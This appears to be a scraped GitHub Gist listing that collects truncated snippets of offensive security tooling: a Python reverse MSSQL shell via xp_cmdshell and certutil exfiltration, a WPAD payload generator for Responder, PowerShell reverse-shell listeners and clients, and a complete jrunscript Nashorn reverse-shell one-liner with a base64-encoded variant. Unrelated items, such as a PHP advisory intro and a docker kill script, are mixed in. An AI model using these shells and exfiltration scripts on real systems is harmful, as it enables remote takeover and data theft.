The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:
- APT33
- APT34
- APT39
- Charming Kitten
MSAdministrator
/ iranian_apit_groups_possible_commands.md
Last active
December 6, 2024 08:14
Iranian APT Groups & Possible Commands Used By These Groups
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import requests | |
| import threading | |
| import HTMLParser | |
| from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler | |
| ''' | |
| Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration | |
| Author: @xassiz | |
| ''' |
jthuraisamy
/ README.md
Last active
September 25, 2019 10:18
CVE-2017-11907 WPAD.dat Generator for Responder
This script generates a payload for use with Responder.
- Generate a payload with
main.py - Copy and paste the one-liner output into the
WPADScriptfield ofResponder.conf.
test@test:~$ python3 main.py --help
usage: main.py [-h] [-o OUT] cmd
staaldraad
/ receivefile.ps1
Created
February 24, 2017 16:28
Small powershell script to bind to port, accept connection and stream to file. useful for ```cat blah.exe | nc 192.168.1.7 8080```
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $socket = new-object System.Net.Sockets.TcpListener('0.0.0.0', 1080); | |
| if($socket -eq $null){ | |
| exit 1; | |
| } | |
| $socket.start(); | |
| $client = $socket.AcceptTcpClient(); | |
| $stream = $client.GetStream(); | |
| $buffer = new-object System.Byte[] 2048; | |
| $file = 'c:/afile.exe'; | |
| $fileStream = New-Object System.IO.FileStream($file, [System.IO.FileMode]'Create', [System.IO.FileAccess]'Write'); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| dir . | Foreach-Object{ | |
| $file = $_ | |
| $hash = Get-FileHash $file -Algorithm MD5 | |
| $fileinfo = Get-Item $file | |
| New-Object -TypeName PSObject -Property @{ | |
| VersionInfo = $fileinfo.VersionInfo | |
| LastWriteTime = $fileinfo.LastWriteTime | |
| Length = $fileinfo.Length | |
| Algorithm = $hash.Algorithm |
Zenexer
/ escapeshellrce.md
Last active
February 10, 2025 18:30
Security Advisory: PHP's escapeshellcmd and escapeshellarg are insecure
Paul Buonopane [email protected] at NamePros
PGP: https://keybase.io/zenexer
I'm working on cleaning up this advisory so that it's more informative at a glance. Suggestions are welcome.
This advisory addresses the underlying PHP vulnerabilities behind Dawid Golunski's [CVE-2016-10033][CVE-2016-10033], [CVE-2016-10045][CVE-2016-10045], and [CVE-2016-10074][CVE-2016-10074]. It assumes prior understanding of these vulnerabilities.
This advisory does not yet have associated CVE identifiers.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413); | |
| if($socket -eq $null){exit 1} | |
| $stream = $socket.GetStream(); | |
| $writer = new-object System.IO.StreamWriter($stream); | |
| $buffer = new-object System.Byte[] 1024; | |
| $encoding = new-object System.Text.AsciiEncoding; | |
| do | |
| { | |
| $writer.Flush(); | |
| $read = $null; |
staaldraad
/ mini-reverse-listener.ps1
Created
October 3, 2016 14:49
A reverse shell listener in powershell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $socket = new-object System.Net.Sockets.TcpListener('127.0.0.1', 413); | |
| if($socket -eq $null){ | |
| exit 1 | |
| } | |
| $socket.start() | |
| $client = $socket.AcceptTcpClient() | |
| write-output "[*] Connection!" |
Nashorn / Rhino:
- Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'- Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
evanscottgray
/ docker_kill.sh
Last active
November 7, 2023 03:40
kill all docker containers at once...
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| docker ps | awk {' print $1 '} | tail -n+2 > tmp.txt; for line in $(cat tmp.txt); do docker kill $line; done; rm tmp.txt |
NewerOlder